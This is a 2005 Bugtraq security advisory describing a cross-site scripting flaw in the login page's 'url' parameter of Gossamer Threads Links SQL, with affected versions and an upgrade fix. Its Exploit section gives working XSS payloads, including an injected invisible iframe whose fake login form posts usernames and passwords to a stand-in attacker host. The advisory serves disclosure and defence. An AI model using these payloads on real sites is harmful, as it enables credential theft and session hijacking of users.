[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: Gossamer Threads Links SQL login XSS Vulnerability
From: Nathan House <nhouse () stationx ! net>
Date: 2005-05-04 9:12:02
Message-ID: 20050504091202.23541.qmail () www ! securityfocus ! com
[Download RAW message or body]
Gossamer Threads Links SQL login XSS Vulnerability
Class
Input Validation XSS
Remote Local Published / Updated
Yes Yes 04th May 2005
Vulnerable
Vulnerable: Gossamer Threads Links SQL v3.0
+ Links SQL 2.x
+ Links SQL 2.2.x
+ Links SQL 3.0
Not Vulnerable
-
Discussion
Links SQL is a perl/mod_perl/PHP web application written by Gossamer Threads and is \
used to build any type of directory. Although designed to manage links, Links SQL is \
very customisable and is used all over the Internet for a wide range of tasks such as \
Image Galleries, Press Releases, Yellowpages, Company Directories, and other \
categorised databases.
The URL variable in the Gossamer Threads Links SQL login page (user.cgi) is a hidden \
field in the login form and can be passed directly to user.cgi in the form of \
user.cgi?url="xyz" The URL variable is client side input created by the browser when \
a user clicks on a link which requires authentication. After authentication the user \
is redirected to the URL in the URL variable. This URL variable does not \
sufficiently validate the client side input and is therefore vulnerable to script \
injection and cross site scripting (XSS) attacks.
Exploit
This is a standard XSS vulnerability.
Note an attacker would normally obfuscate the linking code but for these examples I \
have made it simple for the sake of understanding.
Simple Example 1 (Pop up)
/user.cgi?url="><script>alert("XSS Vulnerability")</script><"&from=rate
Resulting in the following within the HTML being injected:
<input type="hidden" name="url" value=""><script>alert("XSS \
Vulnerability")</script><"" />
Simple Example 2 (iframe to steal username and password)
/user.cgi?url="><iframe%20src="http://www.stationx.net/linksql.html"%20scrolling="No"% \
20align="MIDDLE"%20width="100%"%20height="3000"%20frameborder="No"></iframe><!--&from=rate
Example 2 produces an invisible iframe presenting a fake login screen to collect \
usernames and passwords with the following HTML injected; <form \
action="http://hacker.com/getusernameandpassword.cgi" method="post">
The <script> content is limited by the imagination of the attacker and the \
above are just two examples.
Like all XSS vulnerabilities this is a user attack only and not an attack on the \
system (Links SQL). Although if the user happens to be the links sql moderator/admin \
this user attack could be used to escalate privilege to then attack links sql.
To exploit this XSS vulnerability the victim must be tricked into making the above or \
other carefully crafted HTTP request. There are several ways users can be tricked to \
do this but common methods include via a link in an HTML aware email, a web based \
forum (Gossamer Threads forum) or embedded in a malicious web page.
XSS attacks are often demonstrated harvesting cookies to perform session hijacking \
and gather other sensitive information.
Solution
A new release has been created to fix this problem. Upgrade to Gossamer Links 3.0.1
http://www.gossamer-threads.com/forum/Gossamer_Links_3.0.1_Released_P280986/
http://gossamer-threads.com/perl/gforum/gforum.cgi?post=281029;
Credit
Nathan House @ StationX
References
http://www.stationx.net
http://www.stationx.net/advisories.php
http://www.gossamer-threads.com/scripts/links-sql/index.htm
Legal Notice
Copyright (©) 2005 StationX (UK) ltd. Referred to as “StationX” further more.
This advisory written by StationX can be distributed freely electronically without \
permission from StationX. This advisory may not be altered without the express \
written permission of StationX. If you wish to print this advisory whole or in part \
in any none electronic form please contact StationX for consent.
Disclaimer
This advisory to the best of our knowledge and given current information is correct \
and accurate at the date given above “Published / Updated”. Use of any information \
in this advisory is for informational purposes only to help further the development \
of the security industry and help further secure systems. The information in the \
advisory should NOT be used adversely. StationX, the author and any publishers gives \
no guarantees or warranties at all with regards to any information in this advisory. \
Under no circumstances shall StationX, the author and any publishers be liable in \
contract, tort, or otherwise, for any loss or damage whatsoever arising from use of \
or in any way connected with this advisory or any hyperlinked website, including, \
without limitation, damages for loss of business, loss of profits, business \
interruption, loss of business information, loss of programs or other data on the \
user's information handling system or otherwise maintained, or any other pecuniar y \
loss (even where StationX, the author and any publishers has been advised of the \
possibility of such loss or damage arising).
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic